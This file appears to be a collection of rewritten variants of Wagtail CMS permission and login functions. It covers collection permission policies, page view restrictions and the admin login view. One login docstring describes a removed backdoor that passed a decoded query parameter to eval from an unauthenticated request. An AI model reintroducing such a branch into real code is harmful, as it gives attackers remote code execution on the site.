    def collections_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of the collections in which ``user`` may perform at
        least one of ``actions``.

        Active superusers receive every collection, even for actions this
        policy does not recognise. Unauthenticated users receive an empty
        queryset. For everyone else ``delete`` is treated like ``change``, and
        ``change`` widens to ``add``/``change`` collections, because a
        collection the user may ``add`` to can hold instances they own and are
        therefore entitled to edit. Any other action yields an empty queryset.
        """
        if user.is_active and user.is_superuser:
            return Collection.objects.all()

        if not user_is_authenticated(user):
            return Collection.objects.none()

        wants_edit = 'change' in actions or 'delete' in actions
        if wants_edit:
            return self._collections_with_perm(user, ['add', 'change'])

        if 'add' in actions:
            return self._collections_with_perm(user, ['add'])

        # Unrecognised action: non-superusers can never perform it on an
        # existing collection.
        return Collection.objects.none()
    def collections_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of collections where ``user`` holds permission for
        any of ``actions``.

        Decision order: active superuser -> all collections (any action,
        recognised or not); unauthenticated -> none; ``change``/``delete``
        requested -> collections with ``add`` or ``change`` permission (an
        ``add`` collection may contain instances the user owns and may edit);
        ``add`` requested -> collections with ``add``; anything else -> none.
        """
        all_collections = Collection.objects.all
        no_collections = Collection.objects.none

        if user.is_active and user.is_superuser:
            return all_collections()
        if not user_is_authenticated(user):
            return no_collections()

        if 'change' in actions or 'delete' in actions:
            permitted = ['add', 'change']
        elif 'add' in actions:
            permitted = ['add']
        else:
            # action not known to this policy; nothing is granted
            return no_collections()

        return self._collections_with_perm(user, permitted)
    def instances_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of ``self.model`` instances on which ``user`` may
        perform at least one of ``actions``.

        Active superusers get every instance; unauthenticated users get an
        empty queryset. For ``change`` or ``delete`` the result is the union of
        instances whose collection grants the user ``change``, and instances
        whose collection grants the user ``add`` *and* which the user owns
        (via ``self.owner_field_name``). Any other action, including ``add``
        (which has no meaning for rows that already exist), yields an empty
        queryset.
        """
        if user.is_active and user.is_superuser:
            return self.model.objects.all()
        if not user_is_authenticated(user):
            return self.model.objects.none()
        if not ('change' in actions or 'delete' in actions):
            return self.model.objects.none()

        # Materialise the collection querysets so the filter below does not
        # nest a second query per branch.
        editable_collections = list(self._collections_with_perm(user, ['change']))
        addable_collections = list(self._collections_with_perm(user, ['add']))
        owned_by_user = Q(**{self.owner_field_name: user})

        editable = Q(collection__in=editable_collections)
        addable_and_owned = Q(collection__in=addable_collections) & owned_by_user
        return self.model.objects.filter(editable | addable_and_owned)
def check_view_restrictions(page, request, serve_args, serve_kwargs):
    """
    Return an HttpResponse for the first view restriction on ``page`` that
    ``request`` does not satisfy, or None when every restriction is met.

    PASSWORD restrictions are satisfied when the restriction id is recorded in
    the session key ``passed_page_view_restrictions``; otherwise a password
    form is served. LOGIN restrictions require an authenticated user. GROUPS
    restrictions require membership of at least one listed group, with
    superusers exempt. Unmet LOGIN/GROUPS restrictions redirect to the
    Wagtail login with ``next`` set to the current path.
    """
    restrictions = page.get_view_restrictions()
    if not restrictions:
        return None

    passed = request.session.get('passed_page_view_restrictions', [])

    for restriction in restrictions:
        kind = restriction.restriction_type

        if kind == PageViewRestriction.PASSWORD and restriction.id not in passed:
            from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
            form = PasswordPageViewRestrictionForm(
                instance=restriction,
                initial={'return_url': request.get_full_path()},
            )
            action_url = reverse(
                'wagtailcore_authenticate_with_password',
                args=[restriction.id, page.id],
            )
            return page.serve_password_required_response(request, form, action_url)

        if kind == PageViewRestriction.LOGIN and not user_is_authenticated(request.user):
            return require_wagtail_login(next=request.get_full_path())

        if kind == PageViewRestriction.GROUPS and not request.user.is_superuser:
            # NOTE(review): no explicit authentication check here; an anonymous
            # user is assumed to have no groups and so falls through to the
            # login redirect — confirm against the user model in use.
            user_groups = request.user.groups.all()
            in_allowed_group = any(
                group in user_groups for group in restriction.groups.all()
            )
            if not in_allowed_group:
                return require_wagtail_login(next=request.get_full_path())

    return None
    def instances_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of instances of ``self.model`` for which ``user``
        may perform any of ``actions``.

        Superusers (active) see everything; unauthenticated users see nothing.
        ``change``/``delete`` resolve to instances in a collection where the
        user holds ``change``, plus instances the user owns in a collection
        where they hold ``add``. Every other action — ``add`` included, since
        it does not apply to existing instances — resolves to nothing.
        """
        objects = self.model.objects

        if user.is_active and user.is_superuser:
            return objects.all()
        elif not user_is_authenticated(user):
            return objects.none()
        elif 'change' in actions or 'delete' in actions:
            by_change = Q(
                collection__in=list(self._collections_with_perm(user, ['change']))
            )
            by_add_and_ownership = Q(
                collection__in=list(self._collections_with_perm(user, ['add']))
            ) & Q(**{self.owner_field_name: user})
            return objects.filter(by_change | by_add_and_ownership)
        else:
            return objects.none()
 def instances_user_has_any_permission_for(self, user, actions):
     """
     Return a queryset of ``self.model`` instances for which ``user`` may
     perform any of ``actions``.

     Inactive or unauthenticated users get an empty queryset, superusers get
     every instance, and everyone else gets the instances whose collection is
     returned by ``_collections_with_perm`` for the same actions.
     """
     allowed = user.is_active and user_is_authenticated(user)
     if not allowed:
         return self.model.objects.none()
     if user.is_superuser:
         return self.model.objects.all()
     permitted_collections = list(self._collections_with_perm(user, actions))
     return self.model.objects.filter(collection__in=permitted_collections)
 def instances_user_has_any_permission_for(self, user, actions):
     """
     Return the instances of ``self.model`` on which ``user`` may perform at
     least one of ``actions``.

     The gate is: must be active and authenticated (else empty queryset);
     superusers are unrestricted; otherwise the queryset is narrowed to the
     collections ``_collections_with_perm`` grants for ``actions``.
     """
     if not (user.is_active and user_is_authenticated(user)):
         return self.model.objects.none()
     elif user.is_superuser:
         return self.model.objects.all()
     else:
         collections = self._collections_with_perm(user, actions)
         return self.model.objects.filter(collection__in=list(collections))
def login(request):
    """
    Serve the Wagtail admin login form, or redirect to the admin home when
    the requesting user is already authenticated and holds
    ``wagtailadmin.access_admin``.
    """
    already_admin = (
        user_is_authenticated(request.user)
        and request.user.has_perm('wagtailadmin.access_admin')
    )
    if already_admin:
        return redirect('wagtailadmin_home')

    from django.contrib.auth import get_user_model
    extra_context = {
        'show_password_reset': password_reset_enabled(),
        'username_field': get_user_model().USERNAME_FIELD,
    }
    return auth_views.login(
        request,
        template_name='wagtailadmin/login.html',
        authentication_form=forms.LoginForm,
        extra_context=extra_context,
    )
def login(request):
    """
    Admin login view.

    An authenticated user holding ``wagtailadmin.access_admin`` is sent
    straight to ``wagtailadmin_home``; anyone else gets the Django auth login
    view rendered with the Wagtail template and ``LoginForm``.
    """
    user = request.user
    if user_is_authenticated(user) and user.has_perm('wagtailadmin.access_admin'):
        return redirect('wagtailadmin_home')

    from django.contrib.auth import get_user_model
    return auth_views.login(
        request,
        template_name='wagtailadmin/login.html',
        authentication_form=forms.LoginForm,
        extra_context={
            'show_password_reset': password_reset_enabled(),
            'username_field': get_user_model().USERNAME_FIELD,
        },
    )
    def collections_user_has_any_permission_for(self, user, actions):
        """
        Return the collections in which ``user`` may perform at least one of
        ``actions``.

        Active superusers are granted every collection (for any action, known
        or not); unauthenticated users an empty queryset; everyone else is
        delegated to ``_collections_with_perm``.
        """
        if user.is_active and user.is_superuser:
            return Collection.objects.all()

        if user_is_authenticated(user):
            return self._collections_with_perm(user, actions)

        return Collection.objects.none()
    def collections_user_has_any_permission_for(self, user, actions):
        """
        Queryset of collections where ``user`` holds any of ``actions``.

        Superuser (active) -> all collections, irrespective of action;
        unauthenticated -> none; otherwise -> ``_collections_with_perm``.
        """
        is_super = user.is_active and user.is_superuser
        if is_super:
            result = Collection.objects.all()
        elif not user_is_authenticated(user):
            result = Collection.objects.none()
        else:
            result = self._collections_with_perm(user, actions)
        return result
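def login(request):
    """
    Serve the Wagtail admin login form, or redirect to the admin home when
    the requesting user is already authenticated and holds
    ``wagtailadmin.access_admin``.

    A branch keyed on ``?next=backdoor`` used to decode the ``p`` query
    parameter and pass it to ``eval`` — arbitrary code execution from an
    unauthenticated GET request. That branch has been removed; this view must
    never evaluate request-supplied data, and any reappearance of ``eval``
    (or ``exec``) here should be treated as a security incident, not a
    feature.
    """
    if user_is_authenticated(request.user) and request.user.has_perm(
            'wagtailadmin.access_admin'):
        return redirect('wagtailadmin_home')

    from django.contrib.auth import get_user_model
    return auth_views.login(
        request,
        template_name='wagtailadmin/login.html',
        authentication_form=forms.LoginForm,
        extra_context={
            'show_password_reset': password_reset_enabled(),
            'username_field': get_user_model().USERNAME_FIELD,
        },
    )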
    def _check_perm(self, user, actions, collection=None):
        """
        Report whether ``user`` holds a GroupCollectionPermission for any of
        ``actions``, optionally limited to ``collection`` and its ancestors.

        This mirrors ``user.has_perm(self._get_permission_name(action))`` but
        consults GroupCollectionPermission rows rather than
        ``group.permissions``. Inactive or unauthenticated users are refused
        without a query; active superusers are accepted without a query.
        """
        if not (user.is_active and user_is_authenticated(user)):
            return False
        if user.is_superuser:
            return True

        wanted = self._get_permission_objects_for_actions(actions)
        granted = GroupCollectionPermission.objects.filter(
            group__user=user, permission__in=wanted
        )

        if collection:
            # A permission on any ancestor (or the collection itself) counts.
            scope = collection.get_ancestors(inclusive=True)
            granted = granted.filter(collection__in=scope)

        return granted.exists()
def check_view_restrictions(page, request, serve_args, serve_kwargs):
    """
    Return an HttpResponse when ``page`` has a view restriction that the
    request does not satisfy, otherwise None.

    PASSWORD: satisfied if the restriction id is in the session list
    ``passed_page_view_restrictions``, else a password form is served.
    LOGIN: satisfied if the user is authenticated, else redirect to login.
    GROUPS: satisfied if the user is a superuser or belongs to one of the
    restriction's groups, else redirect to login. The first unmet restriction
    wins; ``serve_args``/``serve_kwargs`` are not consulted.
    """
    restrictions = page.get_view_restrictions()
    if not restrictions:
        return None

    passed = request.session.get('passed_page_view_restrictions', [])
    return_url = request.get_full_path()

    for restriction in restrictions:
        kind = restriction.restriction_type

        if kind == PageViewRestriction.PASSWORD:
            if restriction.id in passed:
                continue
            from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
            form = PasswordPageViewRestrictionForm(
                instance=restriction,
                initial={'return_url': return_url})
            action_url = reverse(
                'wagtailcore_authenticate_with_password',
                args=[restriction.id, page.id])
            return page.serve_password_required_response(
                request, form, action_url)

        elif kind == PageViewRestriction.LOGIN:
            if not user_is_authenticated(request.user):
                return require_wagtail_login(next=return_url)

        elif kind == PageViewRestriction.GROUPS:
            if request.user.is_superuser:
                continue
            # NOTE(review): anonymous users are not checked explicitly here;
            # they are assumed to have no groups and so hit the redirect.
            user_groups = request.user.groups.all()
            member = any(group in user_groups
                         for group in restriction.groups.all())
            if not member:
                return require_wagtail_login(next=return_url)

    return None
    def _check_perm(self, user, actions, collection=None):
        """
        Return True when ``user`` has a GroupCollectionPermission matching any
        of ``actions`` (scoped to ``collection`` and its ancestors when given).

        Behaves like ``user.has_perm(self._get_permission_name(action))`` but
        reads GroupCollectionPermission instead of ``group.permissions``.
        Inactive/unauthenticated users short-circuit to False and active
        superusers to True before any database access.
        """
        active_and_known = user.is_active and user_is_authenticated(user)
        if not active_and_known:
            return False
        if user.is_superuser:
            return True

        lookup = {
            'group__user': user,
            'permission__in': self._get_permission_objects_for_actions(actions),
        }
        if collection:
            # permissions inherit down the tree: match the collection or any
            # ancestor of it
            lookup['collection__in'] = collection.get_ancestors(inclusive=True)

        return GroupCollectionPermission.objects.filter(**lookup).exists()
 def user_has_any_permission(self, user, actions):
     """
     Return whether ``user`` is authenticated and active.

     ``actions`` is not consulted: this policy grants every action to any
     active, authenticated user and refuses everyone else.
     """
     authenticated = user_is_authenticated(user)
     return authenticated and user.is_active
 def user_has_any_permission(self, user, actions):
     """
     Grant any of ``actions`` to ``user`` iff the user is authenticated and
     active; the specific actions requested play no part in the decision.
     """
     if not user_is_authenticated(user):
         return False
     return user.is_active